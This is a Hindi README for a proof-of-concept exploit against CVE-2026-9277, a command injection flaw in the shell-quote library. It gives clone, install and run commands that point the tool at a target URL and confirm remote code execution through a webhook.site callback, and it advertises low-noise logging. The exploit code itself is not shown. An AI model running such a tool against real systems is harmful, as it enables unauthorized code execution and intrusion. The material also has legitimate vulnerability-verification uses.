
CVE-2026-9277 के लिए अवधारणा का प्रमाण शोषण, shell-quote लाइब्रेरी में एक कमांड इंजेक्शन भेद्यता। RCE ट्रिगर करने के लिए पुनरावर्ती JSON ट्रैवर्सल को कॉम्बिनेटरियल उत्परिवर्तन के साथ करता है, OOB सत्यापन और शून्य-शोर लॉगिंग का समर्थन करता है।
एक विशेष प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट स्क्रिप्ट जो CVE-2026-9277 को सत्यापित और प्रदर्शित करने के लिए डिज़ाइन की गई है—यह shell-quote लाइब्रेरी (<= 1.8.3) के पुराने संस्करणों में पाई जाने वाली एक संरचनात्मक कमांड इंजेक्शन भेद्यता है।
स्कैनर इनपुट JSON पेलोड पर गहन संरचनात्मक हेरफेर करता है ताकि रिकर्सिव ट्रैवर्सल के माध्यम से रिमोट कोड एक्ज़ीक्यूशन (RCE) वेक्टर उजागर हो सकें, और एक डायनेमिक नेटवर्क बेसलाइन टाइमिंग इंजन की मदद से फॉल्स पॉज़िटिव को रोकता है।
{"op": "..."} घटकों को आर्ग्युमेंट्स से अलग करके उन्नत आउट-ऑफ-बैंड एक्ज़ीक्यूशन लेआउट को संभालता है।सुनिश्चित करें कि आपके पास Python 3.10+ और आवश्यक पैकेज इंस्टॉल्ड हैं:
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"
